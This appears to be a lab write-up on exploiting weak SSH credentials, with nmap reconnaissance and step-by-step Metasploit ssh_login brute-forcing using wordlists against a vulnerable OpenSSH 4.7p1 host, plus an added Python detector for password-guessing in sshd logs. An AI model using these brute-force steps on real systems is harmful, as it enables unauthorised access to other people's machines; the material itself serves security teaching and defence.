# SSH Weak Credentials Exploitation


## 1. What is SSH?

SSH (Secure Shell) is a network protocol used to securely access and manage systems over a TCP/IP network. It typically runs on port 22 and provides encrypted communication between client and server.

SSH supports:

  • Secure remote login
  • Encrypted command execution
  • Secure file transfer (SCP, SFTP)

## 2. How SSH Works

SSH works on a client-server architecture:

  • Port 22: Used for secure communication

Process:

  1. Client connects to the SSH server
  2. Server presents its public key
  3. Client verifies the server
  4. User authenticates using password or key
  5. Secure shell access is established

## 3. Vulnerability Exploited

Vulnerability Name:

Weak Credentials in SSH Service

Type:

Authentication Weakness / Brute Force

CVE:

N/A (Configuration-based vulnerability)

Description:

The service running on port 22/tcp is identified as OpenSSH 4.7p1 Debian 8ubuntu1. The SSH service is vulnerable due to weak or default credentials, allowing attackers to gain unauthorized access through brute-force attacks using automated tools.


## 4. How the Exploit Works (Concept)

  • The attacker scans the target and finds SSH running on port 22.
  • The service version is identified as OpenSSH 4.7p1.
  • The attacker uses a brute-force module in Metasploit.
  • Multiple username and password combinations are attempted.
  • Valid credentials are discovered.
  • The attacker logs in and gains secure shell access.
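
Seen from the server, the sequence above leaves a recognisable trail in sshd's authentication log: many failed passwords from one source spread over several usernames, then an accepted one. The Python below is an added example, not part of the original post; the log lines are constructed, and the function name and thresholds are assumptions. Counts cover the whole input with no time window.

```python
import re
from collections import defaultdict

# Constructed sshd auth-log lines (documentation-range IPs, made-up users).
SAMPLE_LOG = """\
Mar  3 10:15:01 host sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 40112 ssh2
Mar  3 10:15:02 host sshd[2103]: Failed password for root from 203.0.113.7 port 40114 ssh2
Mar  3 10:15:03 host sshd[2105]: Failed password for invalid user test from 203.0.113.7 port 40116 ssh2
Mar  3 10:15:04 host sshd[2107]: Failed password for backup from 203.0.113.7 port 40118 ssh2
Mar  3 10:15:05 host sshd[2109]: Failed password for user from 203.0.113.7 port 40120 ssh2
Mar  3 10:15:06 host sshd[2111]: Accepted password for user from 203.0.113.7 port 40122 ssh2
Mar  3 10:20:00 host sshd[2200]: Failed password for alice from 198.51.100.20 port 51000 ssh2
Mar  3 10:20:09 host sshd[2202]: Accepted password for alice from 198.51.100.20 port 51002 ssh2
"""

# Greedy user group + end anchor: the *last* "from <ip> port <n> ssh2" wins, so a
# username crafted to contain " from 10.0.0.1 port 1" cannot spoof the source field.
LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>.+) from (?P<ip>\S+) port \d+ ssh2\s*$"
)

def find_password_guessing(log_text, min_failures=5, min_users=3):
    """Return {source_ip: finding} for sources whose failures look list-driven.

    A source is flagged once it has >= min_failures failed passwords spread over
    >= min_users distinct usernames; "compromised_user" is set when an accepted
    password from that source follows the failures (the guess that worked).
    """
    failed = defaultdict(list)  # ip -> usernames of failed attempts
    findings = {}
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failed[ip].append(user)
        tried = failed[ip]
        if len(tried) >= min_failures and len(set(tried)) >= min_users:
            entry = findings.setdefault(
                ip, {"failures": 0, "users_tried": 0, "compromised_user": None})
            entry["failures"], entry["users_tried"] = len(tried), len(set(tried))
            if m["result"] == "Accepted":
                entry["compromised_user"] = user
    return findings

if __name__ == "__main__":
    for ip, finding in find_password_guessing(SAMPLE_LOG).items():
        print(ip, finding)
```

A single mistyped password followed by a successful login, as in the `alice` lines, stays below both thresholds and is not reported.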

## 5. Exploitation

Recon using Nmap

```bash
nmap -sV 192.168.72.130
```

Step 1: Start Metasploit

```bash
msfconsole
```

Step 2: Search for SSH modules

```
search ssh
```

Step 3: Use SSH login module

```
use auxiliary/scanner/ssh/ssh_login
```

Step 4: Set target IP

```
set RHOSTS <target-ip>
```

Step 5: Set username and password list

```
set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
```

Step 6: Run the module

```
run
```

Step 7: Get a shell using valid credentials

```
use auxiliary/scanner/ssh/ssh_login
set USERNAME <found-user>
set PASSWORD <found-password>
set RHOSTS <target-ip>
run
```

## 6. Result

  • Metasploit successfully discovers valid SSH credentials.

  • Secure shell access is obtained on the target machine.

  • Commands can be executed with the privileges of the authenticated user.

Example:

```bash
whoami
```